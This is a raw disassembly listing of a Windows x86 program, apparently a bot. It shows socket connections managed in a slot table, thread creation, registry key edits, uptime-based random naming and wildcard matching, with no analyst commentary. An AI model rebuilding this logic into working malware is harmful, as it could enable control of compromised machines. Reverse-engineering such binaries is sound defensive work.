xor esi, esi
add esp, 10h
cmp ds:dword_423010, esi
jle short loc_40F9A5
loc_40F97F: ; CODE XREF: seg000:0040F9A3�j
call sub_410567
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42DBAC
push 1Ch
push edi
call sub_410A8A
add esp, 14h
inc esi
cmp esi, ds:dword_423010
jl short loc_40F97F
loc_40F9A5: ; CODE XREF: seg000:0040F97D�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F9AB proc near ; CODE XREF: sub_40FA4E+5C�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_41C04C ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset dword_42102C
mov esi, eax
cmp esi, 64h
jbe short loc_40F9FA
call ds:dword_4307A0
test eax, eax
mov eax, offset dword_42DBD0
jnz short loc_40F9E3
mov eax, offset dword_42F3E8
loc_40F9E3: ; CODE XREF: sub_40F9AB+31�j
push eax
push esi
push offset dword_42DBC8
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_410A8A
add esp, 14h
jmp short loc_40FA1A
; ---------------------------------------------------------------------------
loc_40F9FA: ; CODE XREF: sub_40F9AB+22�j
call ds:dword_4307A0
test eax, eax
mov eax, offset dword_42DBD0
jnz short loc_40FA0E
mov eax, offset dword_42F3E8
loc_40FA0E: ; CODE XREF: sub_40F9AB+5C�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_41050B
pop ecx
pop ecx
loc_40FA1A: ; CODE XREF: sub_40F9AB+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_410B60
pop ecx
cmp eax, 2
pop esi
jbe short loc_40FA49
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_411ED0
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_411D00
add esp, 18h
loc_40FA49: ; CODE XREF: sub_40F9AB+7D�j
mov eax, [ebp+arg_0]
leave
retn
sub_40F9AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FA4E proc near ; CODE XREF: sub_4090B0+7F�p
; sub_409218+50�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_42DB54
loc_40FA5A: ; CODE XREF: sub_40FA4E+3F�j
cmp [ebp+arg_C], 0
jz short loc_40FA75
lea eax, [esi-0Ch]
push eax
push [ebp+arg_C]
call sub_410930
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40FA7F
; ---------------------------------------------------------------------------
loc_40FA75: ; CODE XREF: sub_40FA4E+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40FA7F: ; CODE XREF: sub_40FA4E+25�j
test eax, eax
jnz short loc_40FA91
add esi, 14h
inc edi
cmp esi, offset dword_42DBB8
jl short loc_40FA5A
jmp short loc_40FA9F
; ---------------------------------------------------------------------------
loc_40FA91: ; CODE XREF: sub_40FA4E+33�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call ds:dword_42DB58[eax*4]
pop ecx
loc_40FA9F: ; CODE XREF: sub_40FA4E+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_40FAB2
push [ebp+arg_0]
call sub_40F9AB
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FAB2: ; CODE XREF: sub_40FA4E+57�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40FA4E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FAB7 proc near ; DATA XREF: sub_40FB84+7B�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B8h
mov eax, [ebp+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_B8]
push 1
rep movsd
pop esi
mov [eax+0A4h], esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_410590
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_34]
call ds:dword_430794
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call ds:dword_430810
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40FB75
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_430740
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov ds:dword_4358E4[ecx], esi
jz short loc_40FB75
push [ebp+var_34]
push [ebp+var_28]
call ds:dword_43081C
push eax
mov edi, offset dword_45F614
push offset dword_42DBD4
push edi
call sub_41050B
push 0
lea eax, [ebp+var_B4]
push [ebp+var_20]
push edi
push eax
push [ebp+var_B8]
call sub_40E367
push edi
call sub_407E0E
add esp, 28h
loc_40FB75: ; CODE XREF: sub_40FAB7+5D�j
; sub_40FAB7+7E�j
push esi
call ds:dword_430828
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_40FAB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40FB84 proc near ; DATA XREF: seg000:0040BFA2�o
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Ah
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_41C058
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_40FBB2: ; CODE XREF: sub_40FB84+EC�j
push [ebp+var_2C]
push [ebp+var_20]
call ds:dword_43081C
push eax
lea eax, [ebp+var_130]
push offset dword_42DC10
push eax
call sub_41050B
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_4356D8
push eax
call sub_411D00
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_40FAB7
push edi
push edi
call ds:dword_41C06C ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_40FC1E
loc_40FC13: ; CODE XREF: sub_40FB84+98�j
cmp [ebp+var_C], edi
jnz short loc_40FC1E
push 32h
call esi ; Sleep
jmp short loc_40FC13
; ---------------------------------------------------------------------------
loc_40FC1E: ; CODE XREF: sub_40FB84+8D�j
; sub_40FB84+92�j
push [ebp+var_4]
call ds:dword_41C070 ; CloseHandle
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
lea eax, [ebp+var_20]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_4105F0
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_4306D8
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_430790
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_4105F0
add esp, 0Ch
jmp loc_40FBB2
sub_40FB84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FC75 proc near ; CODE XREF: seg000:0040FFA1�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp ds:dword_430860, edi
jnz loc_40FDA7
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset dword_423148
push esi
call ds:dword_430800
test eax, eax
jnz short loc_40FD00
mov ax, ds:word_42E000
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset dword_42DFF4
push [ebp+var_4]
call ds:dword_4307B8
test eax, eax
jz short loc_40FCE2
push offset dword_42DFBC
jmp short loc_40FCE7
; ---------------------------------------------------------------------------
loc_40FCE2: ; CODE XREF: sub_40FC75+64�j
push offset dword_42DF8C
loc_40FCE7: ; CODE XREF: sub_40FC75+6B�j
lea eax, [ebp+var_214]
push eax
call sub_41050B
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_430770
jmp short loc_40FD13
; ---------------------------------------------------------------------------
loc_40FD00: ; CODE XREF: sub_40FC75+36�j
lea eax, [ebp+var_214]
push offset dword_42DF48
push eax
call sub_41050B
pop ecx
pop ecx
loc_40FD13: ; CODE XREF: sub_40FC75+89�j
cmp [ebp+arg_C], edi
jnz short loc_40FD32
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 14h
loc_40FD32: ; CODE XREF: sub_40FC75+A1�j
lea eax, [ebp+var_214]
push eax
call sub_407E0E
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset dword_423160
push esi
call ds:dword_430800
test eax, eax
jnz short loc_40FDA0
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset dword_42DF34
push [ebp+var_4]
mov [ebp+var_8], 1
call ds:dword_4307B8
test eax, eax
jz short loc_40FD82
push offset dword_42DEE4
jmp short loc_40FD87
; ---------------------------------------------------------------------------
loc_40FD82: ; CODE XREF: sub_40FC75+104�j
push offset dword_42DE9C
loc_40FD87: ; CODE XREF: sub_40FC75+10B�j
lea eax, [ebp+var_214]
push eax
call sub_41050B
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_430770
jmp short loc_40FDBA
; ---------------------------------------------------------------------------
loc_40FDA0: ; CODE XREF: sub_40FC75+E2�j
push offset dword_42DE4C
jmp short loc_40FDAC
; ---------------------------------------------------------------------------
loc_40FDA7: ; CODE XREF: sub_40FC75+13�j
push offset dword_42DE08
loc_40FDAC: ; CODE XREF: sub_40FC75+130�j
lea eax, [ebp+var_214]
push eax
call sub_41050B
pop ecx
pop ecx
loc_40FDBA: ; CODE XREF: sub_40FC75+129�j
cmp [ebp+arg_C], edi
jnz short loc_40FDD9
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 14h
loc_40FDD9: ; CODE XREF: sub_40FC75+148�j
lea eax, [ebp+var_214]
push eax
call sub_407E0E
cmp ds:dword_430888, edi
pop ecx
jnz loc_40FF54
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_40FDFC: ; CODE XREF: sub_40FC75+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call ds:dword_4306F0
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_40FE99
cmp eax, 0EAh
jz short loc_40FE99
mov esi, offset dword_42DC58
loc_40FE2D: ; CODE XREF: sub_40FC75+21D�j
push dword ptr [esi]
push edi
call sub_40E9B8
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_40FE44
push offset dword_42DDD0
jmp short loc_40FE49
; ---------------------------------------------------------------------------
loc_40FE44: ; CODE XREF: sub_40FC75+1C6�j
push offset dword_42DD90
loc_40FE49: ; CODE XREF: sub_40FC75+1CD�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_410A8A
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_40FE7C
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 14h
loc_40FE7C: ; CODE XREF: sub_40FC75+1EB�j
lea eax, [ebp+var_214]
push eax
call sub_407E0E
add esi, 8
pop ecx
cmp esi, offset dword_42DC78
jl short loc_40FE2D
jmp loc_40FF31
; ---------------------------------------------------------------------------
loc_40FE99: ; CODE XREF: sub_40FC75+1AA�j
; sub_40FC75+1B1�j
mov esi, [ebp+var_8]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_40FF28
loc_40FEA8: ; CODE XREF: sub_40FC75+2AF�j
mov edi, [esi]
push edi
call sub_4128CC
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_40FF1D
push edi
call sub_40E8A5
push eax
push 0
call sub_40E9B8
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_40FED7
push offset dword_42DD58
jmp short loc_40FEDC
; ---------------------------------------------------------------------------
loc_40FED7: ; CODE XREF: sub_40FC75+259�j
push offset dword_42DD18
loc_40FEDC: ; CODE XREF: sub_40FC75+260�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_410A8A
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_40FF10
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 14h
loc_40FF10: ; CODE XREF: sub_40FC75+27F�j
lea eax, [ebp+var_214]
push eax
call sub_407E0E
pop ecx
loc_40FF1D: ; CODE XREF: sub_40FC75+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_40FEA8
xor edi, edi
loc_40FF28: ; CODE XREF: sub_40FC75+22D�j
push [ebp+var_8]
call ds:dword_430820
loc_40FF31: ; CODE XREF: sub_40FC75+21F�j
cmp [ebp+var_10], 0EAh
jz loc_40FDFC
lea eax, [ebp+var_214]
push offset dword_42DCDC
push eax
call sub_41050B
pop ecx
pop ecx
pop ebx
jmp short loc_40FF67
; ---------------------------------------------------------------------------
loc_40FF54: ; CODE XREF: sub_40FC75+177�j
lea eax, [ebp+var_214]
push offset dword_42DC98
push eax
call sub_41050B
pop ecx
pop ecx
loc_40FF67: ; CODE XREF: sub_40FC75+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_40FF85
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 14h
loc_40FF85: ; CODE XREF: sub_40FC75+2F5�j
lea eax, [ebp+var_214]
push eax
call sub_407E0E
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_40FC75 endp
; ---------------------------------------------------------------------------
loc_40FF99: ; CODE XREF: seg000:0040FFB5�j
; DATA XREF: sub_4089FD+4BC�o
push 1
push 0
push 0
push 0
call sub_40FC75
add esp, 10h
push ds:dword_42DC50
call ds:dword_41C058 ; Sleep
jmp short loc_40FF99
; =============== S U B R O U T I N E =======================================
sub_40FFB7 proc near ; CODE XREF: seg000:004040A4�p
; seg000:004050EA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_4356D8
loc_40FFBF: ; CODE XREF: sub_40FFB7+18�j
cmp byte ptr [eax], 0
jz short loc_40FFD3
add eax, 234h
inc edi
cmp eax, offset dword_45EBC8
jl short loc_40FFBF
jmp short loc_41001E
; ---------------------------------------------------------------------------
loc_40FFD3: ; CODE XREF: sub_40FFB7+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_4356D8[esi]
push eax
call sub_411D00
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov ds:dword_4358D8[esi], eax
and ds:dword_4358DC[esi], 0
mov eax, [esp+8+arg_8]
and ds:dword_4358E0[esi], 0
mov ds:dword_4358E4[esi], eax
and ds:byte_4358F0[esi], 0
pop esi
loc_41001E: ; CODE XREF: sub_40FFB7+1A�j
mov eax, edi
pop edi
retn
sub_40FFB7 endp
; ---------------------------------------------------------------------------
word_410022 dw 8B55h ; DATA XREF: seg000:0040DE84�o
dd 98EC81ECh, 8B000000h, 57560845h, 8B59266Ah, 68BD8DF0h
dd 0F3FFFFFFh, 0F075FFA5h, 9480C7h, 10000h, 858D0000h
dd 0FFFFFF6Ch, 50F475FFh, 0FF68B5FFh, 15E8FFFFh, 0FF000000h
dd 6CE8EC75h, 83000002h, 6A14C4h, 0FBFF8FE8h, 5E5FF1FFh
dd 81EC8B55h, 200ECh, 6A575600h, 1075FF00h, 42E0F868h
dd 0C75FF00h, 0E80875FFh, 0FFFFE2D3h, 3314C483h, 56D8BEFFh
dd 3E800043h, 833C7400h, 7500147Dh, 4BE8309h, 2, 57562D75h
dd 0FE00858Dh, 0B468FFFFh, 500042C5h, 446E8h, 8D016A00h
dd 0FFFE0085h, 1075FFFFh, 0C75FF50h, 0E80875FFh, 0FFFFE28Bh
dd 8124C483h, 234C6h, 0FE814700h, 45EBC8h, 5E5FB07Ch
; ---------------------------------------------------------------------------
leave
retn
; =============== S U B R O U T I N E =======================================
sub_4100F2 proc near ; CODE XREF: seg000:0040D295�p
; sub_410180+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_41017A
cmp esi, 12Ch
jge short loc_41017A
imul esi, 234h
push edi
push ebx
push ds:dword_4358EC[esi]
lea edi, dword_4358EC[esi]
call near ptr 3D0000h
push edi
cmp [edi], ebx
jz short loc_41012A
push 1
pop ebp
loc_41012A: ; CODE XREF: sub_4100F2+33�j
mov [edi], ebx
lea edi, dword_4358E0[esi]
mov ds:dword_4358D8[esi], ebx
mov ds:dword_4358DC[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_41014B
push eax
call sub_40F67C
pop ecx
loc_41014B: ; CODE XREF: sub_4100F2+50�j
mov [edi], ebx
lea edi, dword_4358E4[esi]
mov byte ptr ds:dword_4356D8[esi], bl
mov ds:byte_4358F0[esi], bl
push dword ptr [edi]
call ds:dword_430828
lea esi, dword_4358E8[esi]
mov [edi], ebx
push dword ptr [esi]
call ds:dword_430828
mov [esi], ebx
pop edi
loc_41017A: ; CODE XREF: sub_4100F2+D�j
; sub_4100F2+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_4100F2 endp
; =============== S U B R O U T I N E =======================================
sub_410180 proc near ; CODE XREF: seg000:loc_4070FD�p
; sub_4089FD+18�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_4356D8
loc_41018C: ; CODE XREF: sub_410180+2A�j
cmp byte ptr [esi], 0
jz short loc_41019D
push edi
call sub_4100F2
test eax, eax
pop ecx
jz short loc_41019D
inc ebx
loc_41019D: ; CODE XREF: sub_410180+F�j
; sub_410180+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_45EBC8
jl short loc_41018C
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_410180 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4101B2 proc near ; CODE XREF: sub_410245+1D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_4358DC
loc_4101C6: ; CODE XREF: sub_4101B2+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_4101E8
test edi, edi
jle short loc_4101DA
cmp [esi], edi
jz short loc_4101DA
cmp ebx, edi
jnz short loc_4101E8
loc_4101DA: ; CODE XREF: sub_4101B2+1E�j
; sub_4101B2+22�j
push ebx
call sub_4100F2
test eax, eax
pop ecx
jz short loc_4101E8
inc [ebp+var_4]
loc_4101E8: ; CODE XREF: sub_4101B2+1A�j
; sub_4101B2+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_45EDCC
jl short loc_4101C6
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_4101B2 endp
; =============== S U B R O U T I N E =======================================
sub_4101FF proc near ; CODE XREF: sub_404F83+B�p
; seg000:00405027�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_4358D8
loc_410206: ; CODE XREF: sub_4101FF+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_41020F
inc eax
loc_41020F: ; CODE XREF: sub_4101FF+D�j
add ecx, 234h
cmp ecx, offset dword_45EDC8
jl short loc_410206
retn
sub_4101FF endp
; =============== S U B R O U T I N E =======================================
sub_41021E proc near ; CODE XREF: seg000:0040D98C�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_4358D8
loc_410228: ; CODE XREF: sub_41021E+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_410241
add ecx, 234h
inc edx
cmp ecx, offset dword_45EDC8
jl short loc_410228
pop esi
retn
; ---------------------------------------------------------------------------
loc_410241: ; CODE XREF: sub_41021E+10�j
mov eax, edx
pop esi
retn
sub_41021E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410245 proc near ; CODE XREF: seg000:0040E021�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_41025E
push [ebp+arg_1C]
call sub_410A7F
pop ecx
loc_41025E: ; CODE XREF: sub_410245+E�j
push eax
push [ebp+arg_18]
call sub_4101B2
pop ecx
test eax, eax
pop ecx
jle short loc_41028A
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset dword_42E120
push eax
call sub_41050B
add esp, 14h
jmp short loc_4102A4
; ---------------------------------------------------------------------------
loc_41028A: ; CODE XREF: sub_410245+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset dword_42E108
push eax
call sub_41050B
add esp, 10h
loc_4102A4: ; CODE XREF: sub_410245+43�j
cmp [ebp+arg_C], 0
jnz short loc_4102C4
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 14h
loc_4102C4: ; CODE XREF: sub_410245+63�j
lea eax, [ebp+var_200]
push eax
call sub_407E0E
pop ecx
leave
retn
sub_410245 endp
; =============== S U B R O U T I N E =======================================
sub_4102D3 proc near ; CODE XREF: start+A2�p
; seg000:004014D4�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov ds:dword_4358EC[eax], ecx
mov ds:dword_4358D8[eax], ecx
mov ds:dword_4358DC[eax], ecx
mov ds:dword_4358E0[eax], ecx
mov ds:dword_4358E4[eax], ecx
mov ds:dword_4358E8[eax], ecx
mov byte ptr ds:dword_4356D8[eax], cl
mov ds:byte_4358F0[eax], cl
retn
sub_4102D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410310 proc near ; CODE XREF: seg000:0040E1F3�p
; sub_41043E+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_41031A: ; CODE XREF: sub_410310+68�j
mov cl, [esi]
test cl, cl
jz short loc_41037A
cmp eax, 1
jnz short loc_41037A
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_41037A
cmp cl, 2Ah
jz short loc_410361
cmp cl, 3Fh
jz short loc_410344
cmp cl, 5Bh
jz short loc_410349
xor eax, eax
cmp cl, dl
setz al
loc_410344: ; CODE XREF: sub_410310+26�j
inc [ebp+arg_4]
jmp short loc_410374
; ---------------------------------------------------------------------------
loc_410349: ; CODE XREF: sub_410310+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_4103A6
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_410374
; ---------------------------------------------------------------------------
loc_410361: ; CODE XREF: sub_410310+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_41043E
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_410374: ; CODE XREF: sub_410310+37�j
; sub_410310+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_41031A
; ---------------------------------------------------------------------------
loc_41037A: ; CODE XREF: sub_410310+E�j
; sub_410310+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_41038A
cmp eax, 1
jnz short loc_4103A1
inc esi
mov [ebp+arg_0], esi
jmp short loc_41037A
; ---------------------------------------------------------------------------
loc_41038A: ; CODE XREF: sub_410310+6D�j
cmp eax, 1
jnz short loc_4103A1
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_4103A1
cmp byte ptr [esi], 0
jnz short loc_4103A1
push 1
pop eax
jmp short loc_4103A3
; ---------------------------------------------------------------------------
loc_4103A1: ; CODE XREF: sub_410310+72�j
; sub_410310+7D�j ...
xor eax, eax
loc_4103A3: ; CODE XREF: sub_410310+8F�j
pop esi
pop ebp
retn
sub_410310 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103A6 proc near ; CODE XREF: sub_410310+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_4103C7
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_4103C7: ; CODE XREF: sub_4103A6+19�j
push ebx
push esi
loc_4103C9: ; CODE XREF: sub_4103A6+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_4103D7
cmp [ebp+var_4], eax
jnz short loc_410423
loc_4103D7: ; CODE XREF: sub_4103A6+2A�j
test edi, edi
jnz short loc_410418
cmp bl, 2Dh
jnz short loc_41040C
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_41040C
cmp al, 5Dh
jz short loc_41040C
cmp [ebp+var_4], edi
jnz short loc_41040C
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_410418
cmp bl, al
jg short loc_410418
push 1
mov [edx], esi
pop edi
jmp short loc_410418
; ---------------------------------------------------------------------------
loc_41040C: ; CODE XREF: sub_4103A6+38�j
; sub_4103A6+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_410418
push 1
pop edi
loc_410418: ; CODE XREF: sub_4103A6+33�j
; sub_4103A6+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_4103C9
; ---------------------------------------------------------------------------
loc_410423: ; CODE XREF: sub_4103A6+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_410430
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_410430: ; CODE XREF: sub_4103A6+82�j
cmp edi, eax
jnz short loc_410439
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_410439: ; CODE XREF: sub_4103A6+8C�j
mov eax, edi
pop edi
leave
retn
sub_4103A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41043E proc near ; CODE XREF: sub_410310+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_41045A: ; CODE XREF: sub_41043E+3A�j
cmp [eax], bl
jz short loc_41047A
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_41046F
cmp cl, 2Ah
jnz short loc_41047A
cmp cl, 3Fh
jnz short loc_410472
loc_41046F: ; CODE XREF: sub_41043E+25�j
inc eax
mov [edi], eax
loc_410472: ; CODE XREF: sub_41043E+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_41045A
; ---------------------------------------------------------------------------
loc_41047A: ; CODE XREF: sub_41043E+1E�j
; sub_41043E+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_410485
inc dword ptr [esi]
jmp short loc_41047A
; ---------------------------------------------------------------------------
loc_410485: ; CODE XREF: sub_41043E+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_4104A6
mov edx, [esi]
cmp [edx], bl
jz short loc_410497
xor eax, eax
jmp short loc_410506
; ---------------------------------------------------------------------------
loc_410497: ; CODE XREF: sub_41043E+53�j
cmp cl, bl
jnz short loc_4104A6
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_4104A6
push 1
